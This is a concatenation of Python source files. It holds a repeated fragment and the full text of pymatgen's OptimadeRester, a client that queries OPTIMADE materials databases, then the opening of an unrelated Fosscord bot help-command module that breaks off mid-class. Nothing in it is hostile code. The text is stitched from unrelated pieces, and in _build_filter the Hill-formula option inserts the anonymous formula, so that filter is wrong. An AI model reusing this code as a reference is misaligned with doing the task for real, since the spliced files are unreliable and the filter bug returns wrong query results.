"mcloud.pyrene-mofs": "https://aiida.materialscloud.org/pyrene-mofs/optimade", "mcloud.scdm": "https://aiida.materialscloud.org/autowannier/optimade", "mcloud.sssp": "https://aiida.materialscloud.org/sssplibrary/optimade", "mcloud.stoceriaitf": "https://aiida.materialscloud.org/stoceriaitf/optimade", "mcloud.tc-applicability": "https://aiida.materialscloud.org/tc-applicability/optimade", "mcloud.threedd": "https://aiida.materialscloud.org/3dd/optimade", "mp": "https://optimade.materialsproject.org", "mpds": "https://api.mpds.io", "nmd": "https://nomad-lab.eu/prod/rae/optimade/", "odbx": "https://optimade.odbx.science", "omdb.omdb_production": "http://optimade.openmaterialsdb.se", "oqmd": "http://oqmd.org/optimade/", "tcod": "https://www.crystallography.net/tcod/optimade", } def __init__(self, aliases_or_resource_urls: Optional[Union[str, List[str]]] = None, timeout=5): """ OPTIMADE is an effort to provide a standardized interface to retrieve information from many different materials science databases. This is a client to retrieve structures from OPTIMADE v1 compliant endpoints. It does not yet support all features of the OPTIMADE v1 specification but is intended as a way to quickly search an endpoint in a way familiar to users of pymatgen without needing to know the full OPTIMADE specification. For advanced usage, please see the OPTIMADE documentation at optimade.org and consider calling the APIs directly. For convenience, known OPTIMADE endpoints have been given aliases in pymatgen to save typing the full URL. 
The current list of aliases is: aflow, cod, mcloud.sssp, mcloud.2dstructures, mcloud.2dtopo, mcloud.tc-applicability, mcloud.threedd, mcloud.scdm, mcloud.curated-cofs, mcloud.optimade-sample, mcloud.stoceriaitf, mcloud.pyrene-mofs, mcloud.li-ion-conductors, mp, odbx, omdb.omdb_production, oqmd, tcod To refresh this list of aliases, generated from the current list of OPTIMADE providers at optimade.org, call the refresh_aliases() method. Args: aliases_or_resource_urls: the alias or structure resource URL or a list of aliases or resource URLs, if providing the resource URL directly it should not be an index, this interface can only currently access the "v1/structures" information from the specified resource URL timeout: number of seconds before an attempted request is abandoned, a good timeout is useful when querying many providers, some of which may be offline """ # TODO: maybe we should use the nice pydantic models from optimade-python-tools # for response validation, and use the Lark parser for filter validation self.session = requests.Session() self._timeout = timeout # seconds if isinstance(aliases_or_resource_urls, str): aliases_or_resource_urls = [aliases_or_resource_urls] # this stores a dictionary with keys provider id (in the same format as the aliases) # and values as the corresponding URL self.resources = {} if not aliases_or_resource_urls: aliases_or_resource_urls = list(self.aliases.keys()) _logger.warning( "Connecting to all known OPTIMADE providers, this will be slow. Please connect to only the " f"OPTIMADE providers you want to query. Choose from: {", ".join(self.aliases.keys())}" ) for alias_or_resource_url in aliases_or_resource_urls: if alias_or_resource_url in self.aliases: self.resources[alias_or_resource_url] = self.aliases[alias_or_resource_url] elif self._validate_provider(alias_or_resource_url): # TODO: unclear what the key should be here, the "prefix" is for the root provider, # may need to walk back to the index for the given provider to find the correct identifier self.resources[alias_or_resource_url] = alias_or_resource_url else: _logger.error(f"The following is not a known alias or a valid url: {alias_or_resource_url}") self._providers = {url: self._validate_provider(provider_url=url) for url in self.resources.values()} def __repr__(self): return f"OptimadeRester connected to: {", ".join(self.resources.values())}" def __str__(self): return self.describe() def describe(self): """ Provides human-readable information about the resources being searched by the OptimadeRester. """ provider_text = "\n".join(map(str, (provider for provider in self._providers.values() if provider))) description = f"OptimadeRester connected to:\n{provider_text}" return description #@retry(stop_max_attempt_number=3, wait_random_min=1000, wait_random_max=2000) def _get_json(self, url): """ Retrieves JSON, will attempt to (politely) try again on failure subject to a random delay and a maximum number of attempts. """ return self.session.get(url, timeout=self._timeout).json() @staticmethod def _build_filter( elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None ): """ Convenience method to build an OPTIMADE filter. 
""" filters = [] if elements: if isinstance(elements, str): elements = [elements] elements_str = ", ".join([f'"{el}"' for el in elements]) filters.append(f"(elements HAS ALL {elements_str})") if nsites: if isinstance(nsites, (list, tuple)): filters.append(f"(nsites>={min(nsites)} AND nsites<={max(nsites)})") else: filters.append(f"(nsites={int(nsites)})") if nelements: if isinstance(nelements, (list, tuple)): filters.append(f"(nelements>={min(nelements)} AND nelements<={max(nelements)})") else: filters.append(f"(nelements={int(nelements)})") if chemical_formula_anonymous: filters.append(f'(chemical_formula_anonymous="{chemical_formula_anonymous}")') if chemical_formula_hill: filters.append(f'(chemical_formula_hill="{chemical_formula_anonymous}")') return " AND ".join(filters) def get_structures( self, elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None, ) -> Dict[str, Dict[str, Structure]]: """ Retrieve Structures from OPTIMADE providers. Not all functionality of OPTIMADE is currently exposed in this convenience method. To use a custom filter, call get_structures_with_filter(). Args: elements: List of elements nelements: Number of elements, e.g. 4 or [2, 5] for the range >=2 and <=5 nsites: Number of sites, e.g. 4 or [2, 5] for the range >=2 and <=5 chemical_formula_anonymous: Anonymous chemical formula chemical_formula_hill: Chemical formula following Hill convention Returns: Dict of (Dict Structures keyed by that database's id system) keyed by provider """ optimade_filter = self._build_filter( elements=elements, nelements=nelements, nsites=nsites, chemical_formula_anonymous=chemical_formula_anonymous, chemical_formula_hill=chemical_formula_hill, ) return self.get_structures_with_filter(optimade_filter) def get_snls( self, elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None, ) -> Dict[str, Dict[str, StructureNL]]: """ Retrieve StructureNL from OPTIMADE providers. A StructureNL is an object provided by pymatgen which combines Structure with associated metadata, such as the URL is was downloaded from and any additional namespaced data. Not all functionality of OPTIMADE is currently exposed in this convenience method. To use a custom filter, call get_structures_with_filter(). Args: elements: List of elements nelements: Number of elements, e.g. 4 or [2, 5] for the range >=2 and <=5 nsites: Number of sites, e.g. 4 or [2, 5] for the range >=2 and <=5 chemical_formula_anonymous: Anonymous chemical formula chemical_formula_hill: Chemical formula following Hill convention Returns: Dict of (Dict of StructureNLs keyed by that database's id system) keyed by provider """ optimade_filter = self._build_filter( elements=elements, nelements=nelements, nsites=nsites, chemical_formula_anonymous=chemical_formula_anonymous, chemical_formula_hill=chemical_formula_hill, ) return self.get_snls_with_filter(optimade_filter) def get_structures_with_filter(self, optimade_filter: str) -> Dict[str, Dict[str, Structure]]: """ Get structures satisfying a given OPTIMADE filter. 
Args: filter: An OPTIMADE-compliant filter Returns: Dict of Structures keyed by that database's id system """ all_snls = self.get_snls_with_filter(optimade_filter) all_structures = {} for identifier, snls_dict in all_snls.items(): all_structures[identifier] = {k: snl.structure for k, snl in snls_dict.items()} return all_structures def get_snls_with_filter(self, optimade_filter: str) -> Dict[str, Dict[str, StructureNL]]: """ Get structures satisfying a given OPTIMADE filter. Args: filter: An OPTIMADE-compliant filter Returns: Dict of Structures keyed by that database's id system """ all_snls = {} for identifier, resource in self.resources.items(): fields = "response_fields=lattice_vectors,cartesian_site_positions,species,species_at_sites" url = join(resource, f"v1/structures?filter={optimade_filter}&fields={fields}") try: json = self._get_json(url) structures = self._get_snls_from_resource(json, url, identifier) pbar = PBar(total=json["meta"].get("data_returned", 0), desc=identifier, initial=len(structures)) # TODO: check spec for `more_data_available` boolean, may simplify this conditional if ("links" in json) and ("next" in json["links"]) and (json["links"]["next"]): while "next" in json["links"] and json["links"]["next"]: next_link = json["links"]["next"] if isinstance(next_link, dict) and "href" in next_link: next_link = next_link["href"] json = self._get_json(next_link) additional_structures = self._get_snls_from_resource(json, url, identifier) structures.update(additional_structures) pbar.update(len(additional_structures)) if structures: all_snls[identifier] = structures except Exception as exc: # TODO: manually inspect failures to either (a) correct a bug or (b) raise more appropriate error _logger.error( f"Could not retrieve required information from provider {identifier} and url {url}: {exc}" ) return all_snls @staticmethod def _get_snls_from_resource(json, url, identifier) -> Dict[str, StructureNL]: snls = {} exceptions = set() def _sanitize_symbol(symbol): if symbol == "vacancy": symbol = DummySpecies("X_vacancy", oxidation_state=None) elif symbol == "X": symbol = DummySpecies("X", oxidation_state=None) return symbol def _get_comp(sp_dict): return { _sanitize_symbol(symbol): conc for symbol, conc in zip(sp_dict["chemical_symbols"], sp_dict["concentration"]) } for data in json["data"]: # TODO: check the spec! and remove this try/except (are all providers following spec?) # e.g. can check data["type"] == "structures" try: # e.g. COD structure = Structure( lattice=data["attributes"]["lattice_vectors"], species=[_get_comp(d) for d in data["attributes"]["species"]], coords=data["attributes"]["cartesian_site_positions"], coords_are_cartesian=True, ) namespaced_data = {k: v for k, v in data.items() if k.startswith("_")} # TODO: follow `references` to add reference information here snl = StructureNL( structure, authors={}, history=[{"name": identifier, "url": url, "description": {"id": data["id"]}}], data={"_optimade": namespaced_data}, ) snls[data["id"]] = snl # TODO: bare exception, remove... except Exception: try: # e.g. 
MP (all ordered, no vacancies) structure = Structure( lattice=data["attributes"]["lattice_vectors"], species=data["attributes"]["species_at_sites"], coords=data["attributes"]["cartesian_site_positions"], coords_are_cartesian=True, ) namespaced_data = {k: v for k, v in data["attributes"].items() if k.startswith("_")} # TODO: follow `references` to add reference information here snl = StructureNL( structure, authors={}, history=[{"name": identifier, "url": url, "description": {"id": data["id"]}}], data={"_optimade": namespaced_data}, ) snls[data["id"]] = snl except Exception as exc: if str(exc) not in exceptions: exceptions.add(str(exc)) if exceptions: _logger.error(f'Failed to parse returned data for {url}: {', '.join(exceptions)}') return snls def _validate_provider(self, provider_url) -> Optional[Provider]: """ Checks that a given URL is indeed an OPTIMADE provider, returning None if it is not a provider, or the provider prefix if it is. TODO: careful reading of OPTIMADE specification required TODO: add better exception handling, intentionally permissive currently """ def is_url(url): """ Basic URL validation thanks to https://stackoverflow.com/a/52455972 """ try: result = urlparse(url) return all([result.scheme, result.netloc]) except ValueError: return False if not is_url(provider_url): _logger.warning(f"An invalid url was supplied: {provider_url}") return None try: url = join(provider_url, "v1/info") provider_info_json = self._get_json(url) except Exception as exc: _logger.warning(f"Failed to parse {url} when validating: {exc}") return None try: return Provider( name=provider_info_json["meta"].get("provider", {}).get("name", "Unknown"), base_url=provider_url, description=provider_info_json["meta"].get("provider", {}).get("description", "Unknown"), homepage=provider_info_json["meta"].get("provider", {}).get("homepage"), prefix=provider_info_json["meta"].get("provider", {}).get("prefix", "Unknown"), ) except Exception as exc: _logger.warning(f"Failed to extract required information from {url}: {exc}") return None def _parse_provider(self, provider, provider_url) -> Dict[str, Provider]: """ Used internally to update the list of providers or to check a given URL is valid. It does not raise exceptions but will instead _logger.warning and provide an empty dictionary in the case of invalid data. In future, when the specification is sufficiently well adopted, we might be more strict here. Args: provider: the provider prefix provider_url: An OPTIMADE provider URL Returns: A dictionary of keys (in format of "provider.database") to Provider objects. """ try: url = join(provider_url, "v1/links") provider_link_json = self._get_json(url) except Exception as exc: _logger.error(f"Failed to parse {url} when following links: {exc}") return {} def _parse_provider_link(provider, provider_link_json): """No validation attempted.""" ps = {} try: d = [d for d in provider_link_json["data"] if d["attributes"]["link_type"] == "child"] for link in d: key = f"{provider}.{link["id"]}" if provider != link["id"] else provider if link["attributes"]["base_url"]: ps[key] = Provider( name=link["attributes"]["name"], base_url=link["attributes"]["base_url"], description=link["attributes"]["description"], homepage=link["attributes"].get("homepage"), prefix=link["attributes"].get("prefix"), ) except Exception: # print(f"Failed to parse {provider}: {exc}") # Not all providers parse yet. 
pass return ps return _parse_provider_link(provider, provider_link_json) def refresh_aliases(self, providers_url="https://providers.optimade.org/providers.json"): """ Updates available OPTIMADE structure resources based on the current list of OPTIMADE providers. """ json = self._get_json(providers_url) providers_from_url = { entry["id"]: entry["attributes"]["base_url"] for entry in json["data"] if entry["attributes"]["base_url"] } structure_providers = {} for provider, provider_link in providers_from_url.items(): structure_providers.update(self._parse_provider(provider, provider_link)) self.aliases = {alias: provider.base_url for alias, provider in structure_providers.items()} # TODO: revisit context manager logic here and in MPRester def __enter__(self): """ Support for "with" context. """ return self def __exit__(self, exc_type, exc_val, exc_tb): """ Support for "with" context. """ self.session.close()
""" Optimade support. """ import logging import sys from collections import namedtuple from os.path import join from typing import Dict, Union, List, Optional from urllib.parse import urlparse import requests #from retrying import retry from pymatgen.core.periodic_table import DummySpecies from pymatgen.core.structure import Structure from pymatgen.util.provenance import StructureNL from pymatgen.util.sequence import PBar # TODO: importing optimade-python-tool's data structures will make more sense Provider = namedtuple("Provider", ["name", "base_url", "description", "homepage", "prefix"]) _logger = logging.getLogger(__name__) _handler = logging.StreamHandler(sys.stdout) _logger.addHandler(_handler) _logger.setLevel(logging.WARNING) class OptimadeRester: """ Class to call OPTIMADE-compliant APIs, see optimade.org This class is ready to use but considered in-development and subject to change until the OPTIMADE paper is published. """ # regenerate on-demand from official providers.json using OptimadeRester.refresh_aliases() # these aliases are provided as a convenient shortcut for users of the OptimadeRester class aliases = { "aflow": "http://aflow.org/API/optimade/", "cod": "https://www.crystallography.net/cod/optimade", "mcloud.2dstructures": "https://aiida.materialscloud.org/2dstructures/optimade", "mcloud.2dtopo": "https://aiida.materialscloud.org/2dtopo/optimade", "mcloud.curated-cofs": "https://aiida.materialscloud.org/curated-cofs/optimade", "mcloud.li-ion-conductors": "https://aiida.materialscloud.org/li-ion-conductors/optimade", "mcloud.optimade-sample": "https://aiida.materialscloud.org/optimade-sample/optimade", "mcloud.pyrene-mofs": "https://aiida.materialscloud.org/pyrene-mofs/optimade", "mcloud.scdm": "https://aiida.materialscloud.org/autowannier/optimade", "mcloud.sssp": "https://aiida.materialscloud.org/sssplibrary/optimade", "mcloud.stoceriaitf": "https://aiida.materialscloud.org/stoceriaitf/optimade", "mcloud.tc-applicability": "https://aiida.materialscloud.org/tc-applicability/optimade", "mcloud.threedd": "https://aiida.materialscloud.org/3dd/optimade", "mp": "https://optimade.materialsproject.org", "mpds": "https://api.mpds.io", "nmd": "https://nomad-lab.eu/prod/rae/optimade/", "odbx": "https://optimade.odbx.science", "omdb.omdb_production": "http://optimade.openmaterialsdb.se", "oqmd": "http://oqmd.org/optimade/", "tcod": "https://www.crystallography.net/tcod/optimade", } def __init__(self, aliases_or_resource_urls: Optional[Union[str, List[str]]] = None, timeout=5): """ OPTIMADE is an effort to provide a standardized interface to retrieve information from many different materials science databases. This is a client to retrieve structures from OPTIMADE v1 compliant endpoints. It does not yet support all features of the OPTIMADE v1 specification but is intended as a way to quickly search an endpoint in a way familiar to users of pymatgen without needing to know the full OPTIMADE specification. For advanced usage, please see the OPTIMADE documentation at optimade.org and consider calling the APIs directly. For convenience, known OPTIMADE endpoints have been given aliases in pymatgen to save typing the full URL. 
The current list of aliases is: aflow, cod, mcloud.sssp, mcloud.2dstructures, mcloud.2dtopo, mcloud.tc-applicability, mcloud.threedd, mcloud.scdm, mcloud.curated-cofs, mcloud.optimade-sample, mcloud.stoceriaitf, mcloud.pyrene-mofs, mcloud.li-ion-conductors, mp, odbx, omdb.omdb_production, oqmd, tcod To refresh this list of aliases, generated from the current list of OPTIMADE providers at optimade.org, call the refresh_aliases() method. Args: aliases_or_resource_urls: the alias or structure resource URL or a list of aliases or resource URLs, if providing the resource URL directly it should not be an index, this interface can only currently access the "v1/structures" information from the specified resource URL timeout: number of seconds before an attempted request is abandoned, a good timeout is useful when querying many providers, some of which may be offline """ # TODO: maybe we should use the nice pydantic models from optimade-python-tools # for response validation, and use the Lark parser for filter validation self.session = requests.Session() self._timeout = timeout # seconds if isinstance(aliases_or_resource_urls, str): aliases_or_resource_urls = [aliases_or_resource_urls] # this stores a dictionary with keys provider id (in the same format as the aliases) # and values as the corresponding URL self.resources = {} if not aliases_or_resource_urls: aliases_or_resource_urls = list(self.aliases.keys()) _logger.warning( "Connecting to all known OPTIMADE providers, this will be slow. Please connect to only the " f"OPTIMADE providers you want to query. Choose from: {', '.join(self.aliases.keys())}" ) for alias_or_resource_url in aliases_or_resource_urls: if alias_or_resource_url in self.aliases: self.resources[alias_or_resource_url] = self.aliases[alias_or_resource_url] elif self._validate_provider(alias_or_resource_url): # TODO: unclear what the key should be here, the "prefix" is for the root provider, # may need to walk back to the index for the given provider to find the correct identifier self.resources[alias_or_resource_url] = alias_or_resource_url else: _logger.error(f"The following is not a known alias or a valid url: {alias_or_resource_url}") self._providers = {url: self._validate_provider(provider_url=url) for url in self.resources.values()} def __repr__(self): return f"OptimadeRester connected to: {', '.join(self.resources.values())}" def __str__(self): return self.describe() def describe(self): """ Provides human-readable information about the resources being searched by the OptimadeRester. """ provider_text = "\n".join(map(str, (provider for provider in self._providers.values() if provider))) description = f"OptimadeRester connected to:\n{provider_text}" return description #@retry(stop_max_attempt_number=3, wait_random_min=1000, wait_random_max=2000) def _get_json(self, url): """ Retrieves JSON, will attempt to (politely) try again on failure subject to a random delay and a maximum number of attempts. """ return self.session.get(url, timeout=self._timeout).json() @staticmethod def _build_filter( elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None ): """ Convenience method to build an OPTIMADE filter. 
""" filters = [] if elements: if isinstance(elements, str): elements = [elements] elements_str = ", ".join([f'"{el}"' for el in elements]) filters.append(f"(elements HAS ALL {elements_str})") if nsites: if isinstance(nsites, (list, tuple)): filters.append(f"(nsites>={min(nsites)} AND nsites<={max(nsites)})") else: filters.append(f"(nsites={int(nsites)})") if nelements: if isinstance(nelements, (list, tuple)): filters.append(f"(nelements>={min(nelements)} AND nelements<={max(nelements)})") else: filters.append(f"(nelements={int(nelements)})") if chemical_formula_anonymous: filters.append(f'(chemical_formula_anonymous="{chemical_formula_anonymous}")') if chemical_formula_hill: filters.append(f'(chemical_formula_hill="{chemical_formula_anonymous}")') return " AND ".join(filters) def get_structures( self, elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None, ) -> Dict[str, Dict[str, Structure]]: """ Retrieve Structures from OPTIMADE providers. Not all functionality of OPTIMADE is currently exposed in this convenience method. To use a custom filter, call get_structures_with_filter(). Args: elements: List of elements nelements: Number of elements, e.g. 4 or [2, 5] for the range >=2 and <=5 nsites: Number of sites, e.g. 4 or [2, 5] for the range >=2 and <=5 chemical_formula_anonymous: Anonymous chemical formula chemical_formula_hill: Chemical formula following Hill convention Returns: Dict of (Dict Structures keyed by that database's id system) keyed by provider """ optimade_filter = self._build_filter( elements=elements, nelements=nelements, nsites=nsites, chemical_formula_anonymous=chemical_formula_anonymous, chemical_formula_hill=chemical_formula_hill, ) return self.get_structures_with_filter(optimade_filter) def get_snls( self, elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None, ) -> Dict[str, Dict[str, StructureNL]]: """ Retrieve StructureNL from OPTIMADE providers. A StructureNL is an object provided by pymatgen which combines Structure with associated metadata, such as the URL is was downloaded from and any additional namespaced data. Not all functionality of OPTIMADE is currently exposed in this convenience method. To use a custom filter, call get_structures_with_filter(). Args: elements: List of elements nelements: Number of elements, e.g. 4 or [2, 5] for the range >=2 and <=5 nsites: Number of sites, e.g. 4 or [2, 5] for the range >=2 and <=5 chemical_formula_anonymous: Anonymous chemical formula chemical_formula_hill: Chemical formula following Hill convention Returns: Dict of (Dict of StructureNLs keyed by that database's id system) keyed by provider """ optimade_filter = self._build_filter( elements=elements, nelements=nelements, nsites=nsites, chemical_formula_anonymous=chemical_formula_anonymous, chemical_formula_hill=chemical_formula_hill, ) return self.get_snls_with_filter(optimade_filter) def get_structures_with_filter(self, optimade_filter: str) -> Dict[str, Dict[str, Structure]]: """ Get structures satisfying a given OPTIMADE filter. 
Args: filter: An OPTIMADE-compliant filter Returns: Dict of Structures keyed by that database's id system """ all_snls = self.get_snls_with_filter(optimade_filter) all_structures = {} for identifier, snls_dict in all_snls.items(): all_structures[identifier] = {k: snl.structure for k, snl in snls_dict.items()} return all_structures def get_snls_with_filter(self, optimade_filter: str) -> Dict[str, Dict[str, StructureNL]]: """ Get structures satisfying a given OPTIMADE filter. Args: filter: An OPTIMADE-compliant filter Returns: Dict of Structures keyed by that database's id system """ all_snls = {} for identifier, resource in self.resources.items(): fields = "response_fields=lattice_vectors,cartesian_site_positions,species,species_at_sites" url = join(resource, f"v1/structures?filter={optimade_filter}&fields={fields}") try: json = self._get_json(url) structures = self._get_snls_from_resource(json, url, identifier) pbar = PBar(total=json["meta"].get("data_returned", 0), desc=identifier, initial=len(structures)) # TODO: check spec for `more_data_available` boolean, may simplify this conditional if ("links" in json) and ("next" in json["links"]) and (json["links"]["next"]): while "next" in json["links"] and json["links"]["next"]: next_link = json["links"]["next"] if isinstance(next_link, dict) and "href" in next_link: next_link = next_link["href"] json = self._get_json(next_link) additional_structures = self._get_snls_from_resource(json, url, identifier) structures.update(additional_structures) pbar.update(len(additional_structures)) if structures: all_snls[identifier] = structures except Exception as exc: # TODO: manually inspect failures to either (a) correct a bug or (b) raise more appropriate error _logger.error( f"Could not retrieve required information from provider {identifier} and url {url}: {exc}" ) return all_snls @staticmethod def _get_snls_from_resource(json, url, identifier) -> Dict[str, StructureNL]: snls = {} exceptions = set() def _sanitize_symbol(symbol): if symbol == "vacancy": symbol = DummySpecies("X_vacancy", oxidation_state=None) elif symbol == "X": symbol = DummySpecies("X", oxidation_state=None) return symbol def _get_comp(sp_dict): return { _sanitize_symbol(symbol): conc for symbol, conc in zip(sp_dict["chemical_symbols"], sp_dict["concentration"]) } for data in json["data"]: # TODO: check the spec! and remove this try/except (are all providers following spec?) # e.g. can check data["type"] == "structures" try: # e.g. COD structure = Structure( lattice=data["attributes"]["lattice_vectors"], species=[_get_comp(d) for d in data["attributes"]["species"]], coords=data["attributes"]["cartesian_site_positions"], coords_are_cartesian=True, ) namespaced_data = {k: v for k, v in data.items() if k.startswith("_")} # TODO: follow `references` to add reference information here snl = StructureNL( structure, authors={}, history=[{"name": identifier, "url": url, "description": {"id": data["id"]}}], data={"_optimade": namespaced_data}, ) snls[data["id"]] = snl # TODO: bare exception, remove... except Exception: try: # e.g. 
MP (all ordered, no vacancies) structure = Structure( lattice=data["attributes"]["lattice_vectors"], species=data["attributes"]["species_at_sites"], coords=data["attributes"]["cartesian_site_positions"], coords_are_cartesian=True, ) namespaced_data = {k: v for k, v in data["attributes"].items() if k.startswith("_")} # TODO: follow `references` to add reference information here snl = StructureNL( structure, authors={}, history=[{"name": identifier, "url": url, "description": {"id": data["id"]}}], data={"_optimade": namespaced_data}, ) snls[data["id"]] = snl except Exception as exc: if str(exc) not in exceptions: exceptions.add(str(exc)) if exceptions: _logger.error(f'Failed to parse returned data for {url}: {", ".join(exceptions)}') return snls def _validate_provider(self, provider_url) -> Optional[Provider]: """ Checks that a given URL is indeed an OPTIMADE provider, returning None if it is not a provider, or the provider prefix if it is. TODO: careful reading of OPTIMADE specification required TODO: add better exception handling, intentionally permissive currently """ def is_url(url): """ Basic URL validation thanks to https://stackoverflow.com/a/52455972 """ try: result = urlparse(url) return all([result.scheme, result.netloc]) except ValueError: return False if not is_url(provider_url): _logger.warning(f"An invalid url was supplied: {provider_url}") return None try: url = join(provider_url, "v1/info") provider_info_json = self._get_json(url) except Exception as exc: _logger.warning(f"Failed to parse {url} when validating: {exc}") return None try: return Provider( name=provider_info_json["meta"].get("provider", {}).get("name", "Unknown"), base_url=provider_url, description=provider_info_json["meta"].get("provider", {}).get("description", "Unknown"), homepage=provider_info_json["meta"].get("provider", {}).get("homepage"), prefix=provider_info_json["meta"].get("provider", {}).get("prefix", "Unknown"), ) except Exception as exc: _logger.warning(f"Failed to extract required information from {url}: {exc}") return None def _parse_provider(self, provider, provider_url) -> Dict[str, Provider]: """ Used internally to update the list of providers or to check a given URL is valid. It does not raise exceptions but will instead _logger.warning and provide an empty dictionary in the case of invalid data. In future, when the specification is sufficiently well adopted, we might be more strict here. Args: provider: the provider prefix provider_url: An OPTIMADE provider URL Returns: A dictionary of keys (in format of "provider.database") to Provider objects. """ try: url = join(provider_url, "v1/links") provider_link_json = self._get_json(url) except Exception as exc: _logger.error(f"Failed to parse {url} when following links: {exc}") return {} def _parse_provider_link(provider, provider_link_json): """No validation attempted.""" ps = {} try: d = [d for d in provider_link_json["data"] if d["attributes"]["link_type"] == "child"] for link in d: key = f"{provider}.{link['id']}" if provider != link["id"] else provider if link["attributes"]["base_url"]: ps[key] = Provider( name=link["attributes"]["name"], base_url=link["attributes"]["base_url"], description=link["attributes"]["description"], homepage=link["attributes"].get("homepage"), prefix=link["attributes"].get("prefix"), ) except Exception: # print(f"Failed to parse {provider}: {exc}") # Not all providers parse yet. 
pass return ps return _parse_provider_link(provider, provider_link_json) def refresh_aliases(self, providers_url="https://providers.optimade.org/providers.json"): """ Updates available OPTIMADE structure resources based on the current list of OPTIMADE providers. """ json = self._get_json(providers_url) providers_from_url = { entry["id"]: entry["attributes"]["base_url"] for entry in json["data"] if entry["attributes"]["base_url"] } structure_providers = {} for provider, provider_link in providers_from_url.items(): structure_providers.update(self._parse_provider(provider, provider_link)) self.aliases = {alias: provider.base_url for alias, provider in structure_providers.items()} # TODO: revisit context manager logic here and in MPRester def __enter__(self): """ Support for "with" context. """ return self def __exit__(self, exc_type, exc_val, exc_tb): """ Support for "with" context. """ self.session.close()
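A brief usage sketch for the class above; the chosen aliases, filter values and printed fields are illustrative only, and live network access to the queried providers is assumed:

# Usage sketch: query two providers (aliases defined above) for Si-O binaries.
with OptimadeRester(["mp", "oqmd"], timeout=10) as opt:
    structures = opt.get_structures(elements=["Si", "O"], nelements=2)
    for provider, by_id in structures.items():
        print(provider, len(by_id))
    # Or pass an explicit OPTIMADE filter string directly:
    snls = opt.get_snls_with_filter('(chemical_formula_anonymous="AB2")')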
""" The MIT License (MIT) Copyright (c) 2015-present Rapptz Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import itertools import copy import functools import inspect import re from typing import Optional, TYPE_CHECKING import fosscord.utils from .core import Group, Command from .errors import CommandError if TYPE_CHECKING: from .context import Context __all__ = ( 'Paginator', 'HelpCommand', 'DefaultHelpCommand', 'MinimalHelpCommand', ) # help -> shows info of bot on top/bottom and lists subcommands # help command -> shows detailed info of command # help command <subcommand chain> -> same as above # <description> # <command signature with aliases> # <long doc> # Cog: # <command> <shortdoc> # <command> <shortdoc> # Other Cog: # <command> <shortdoc> # No Category: # <command> <shortdoc> # Type <prefix>help command for more info on a command. # You can also type <prefix>help category for more info on a category. class Paginator: """A class that aids in paginating code blocks for Fosscord messages. .. container:: operations .. describe:: len(x) Returns the total number of characters in the paginator. Attributes ----------- prefix: :class:`str` The prefix inserted to every page. e.g. three backticks. suffix: :class:`str` The suffix appended at the end of every page. e.g. three backticks. max_size: :class:`int` The maximum amount of codepoints allowed in a page. linesep: :class:`str` The character string inserted between lines. e.g. a newline character. .. versionadded:: 1.7 """ def __init__(self, prefix='```', suffix='```', max_size=2000, linesep='\n'): self.prefix = prefix self.suffix = suffix self.max_size = max_size self.linesep = linesep self.clear() def clear(self): """Clears the paginator to have no pages.""" if self.prefix is not None: self._current_page = [self.prefix] self._count = len(self.prefix) + self._linesep_len # prefix + newline else: self._current_page = [] self._count = 0 self._pages = [] @property def _prefix_len(self): return len(self.prefix) if self.prefix else 0 @property def _suffix_len(self): return len(self.suffix) if self.suffix else 0 @property def _linesep_len(self): return len(self.linesep) def add_line(self, line='', *, empty=False): """Adds a line to the current page. If the line exceeds the :attr:`max_size` then an exception is raised. Parameters ----------- line: :class:`str` The line to add. empty: :class:`bool` Indicates if another empty line should be added. Raises ------ RuntimeError The line was too big for the current :attr:`max_size`. 
""" max_page_size = self.max_size - self._prefix_len - self._suffix_len - 2 * self._linesep_len if len(line) > max_page_size: raise RuntimeError(f'Line exceeds maximum page size {max_page_size}') if self._count + len(line) + self._linesep_len > self.max_size - self._suffix_len: self.close_page() self._count += len(line) + self._linesep_len self._current_page.append(line) if empty: self._current_page.append('') self._count += self._linesep_len def close_page(self): """Prematurely terminate a page.""" if self.suffix is not None: self._current_page.append(self.suffix) self._pages.append(self.linesep.join(self._current_page)) if self.prefix is not None: self._current_page = [self.prefix] self._count = len(self.prefix) + self._linesep_len # prefix + linesep else: self._current_page = [] self._count = 0 def __len__(self): total = sum(len(p) for p in self._pages) return total + self._count @property def pages(self): """List[:class:`str`]: Returns the rendered list of pages.""" # we have more than just the prefix in our current page if len(self._current_page) > (0 if self.prefix is None else 1): self.close_page() return self._pages def __repr__(self): fmt = '<Paginator prefix: {0.prefix!r} suffix: {0.suffix!r} linesep: {0.linesep!r} max_size: {0.max_size} count: {0._count}>' return fmt.format(self) def _not_overriden(f): f.__help_command_not_overriden__ = True return f class _HelpCommandImpl(Command): def __init__(self, inject, *args, **kwargs): super().__init__(inject.command_callback, *args, **kwargs) self._original = inject self._injected = inject async def prepare(self, ctx): self._injected = injected = self._original.copy() injected.context = ctx self.callback = injected.command_callback on_error = injected.on_help_command_error if not hasattr(on_error, '__help_command_not_overriden__'): if self.cog is not None: self.on_error = self._on_error_cog_implementation else: self.on_error = on_error await super().prepare(ctx) async def _parse_arguments(self, ctx): # Make the parser think we don't have a cog so it doesn't # inject the parameter into `ctx.args`. original_cog = self.cog self.cog = None try: await super()._parse_arguments(ctx) finally: self.cog = original_cog async def _on_error_cog_implementation(self, dummy, ctx, error): await self._injected.on_help_command_error(ctx, error) 